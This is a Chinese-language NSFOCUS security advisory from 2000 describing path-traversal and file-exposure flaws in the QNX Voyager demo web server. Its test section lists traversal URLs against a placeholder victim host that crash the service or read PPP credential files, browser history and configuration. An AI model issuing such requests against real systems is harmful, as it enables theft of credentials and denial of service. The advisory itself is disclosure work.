安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
QNX Voyager 存在多个WWW服务设计漏洞
发布日期:
2000-09-07
更新日期:
2000-09-07
受影响系统:
QSSL Voyager 2.01B
+ QSSL QNX 4.05 Demo Disk
描述:
QNX Voyager demo disk提供的WWW服务软件存在几处漏洞。
首先,Voyager允许URL请求中使用相对路径,比如../,使得用户可以访问document
root之外的文件。其次,对WWW服务本身没有足够的安全限制,WWW服务可以访问任意
文件,包括本应受保护的文件,比如/dev目录下的文件。第三,因为WWW服务和WWW浏
览器集合在一起,Photon GUI所使用的信息很容易暴露,用户只需要请求位于
/.photon/目录下的文件即可。最后,WWW浏览器产生的html文件,比如错误信息一类
的文件,它们和QNX配置接口共享同一个目录。
<* 来源:(
neonbunny@alt.ph.uk.com
) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
对WWW服务进行拒绝服务攻击:
http://www.victim.com/../../dev/dns
获取最近一次的PPP口令 (modem build of Voyager):
http://www.victim.com/../../etc/ppp/chap-secrets
http://www.victim.com/../../etc/ppp/pap-secrets
WWW浏览器配置文件
http://www.victim.com/.photon/voyager/config.full
最近访问过的站点
http://www.victim.com/.photon/voyager/history.html
书签站点
http://www.victim.com/.photon/voyager/hotlist
Photon GUI启动菜单内容列表
http://www.victim.com/.photon/pwm/pwm.menu
Modem初始化信息
http://www.victim.com/.photon/phdial/connection
[Modem build only]
当前屏幕设置
http://www.victim.com/../../etc/config/trap/crt.cur.1
建议:
临时解决办法:
NSFOCUS建议您在厂商提供补丁以前暂时停止使用此WWW服务器。
厂商补丁:
暂无
浏览次数:
5778
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客